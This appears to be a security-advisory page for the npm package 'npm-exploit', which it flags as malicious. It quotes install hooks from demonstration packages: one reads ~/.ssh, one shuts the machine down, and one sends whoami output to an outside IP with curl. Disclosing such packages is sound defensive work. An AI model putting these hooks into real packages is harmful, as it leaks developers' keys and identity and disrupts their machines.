npm-exploit@0.0.1-security vulnerabilities

security holding package

  • latest version

    0.0.1-security

  • first published

    5 years ago

  • latest version published

    5 years ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the npm-exploit package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • H
    Malicious Package

    npm-exploit is a malicious package that is used to demonstrate or test malicious install scripts. These scripts can send your local ssh file to an attacker, or download malicious files and run them in the background.

    This is especially dangerous in production runtime environments, where environment variables tend to consist of keys, passwords, tokens and other secrets.

    The list of packages and their scripts are:

    {
      "name": "maybemaliciouspackage",
      "scripts": {
        "postinstall": "find ~/.ssh | xargs cat || true && echo '\n\n\n\n\n\nOH HEY LOOK SSH KEYS\n\n\n\n\n\n\n'"
      }
    },
    {
      "name": "deasyncp",
      "scripts": {
        "preinstall": "say U WOT M8; shutdown -s now"
      }
    },
    {
      "name": "harmlesspackage",
      "scripts": {
        "postinstall": "echo '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThanks for your SSH         keys :)' && curl -X GET http://1.3.3.7:1337/\\?$(whoami)"
      }
    },
    {
      "name": "npm-exploit",
      "scripts": {
        "install": "mkdir -p ~/Desktop/sploit && touch ~/Desktop/sploit/haxx"
      }
    }
    

    How to fix Malicious Package?

    Avoid usage of this package altogether.

    *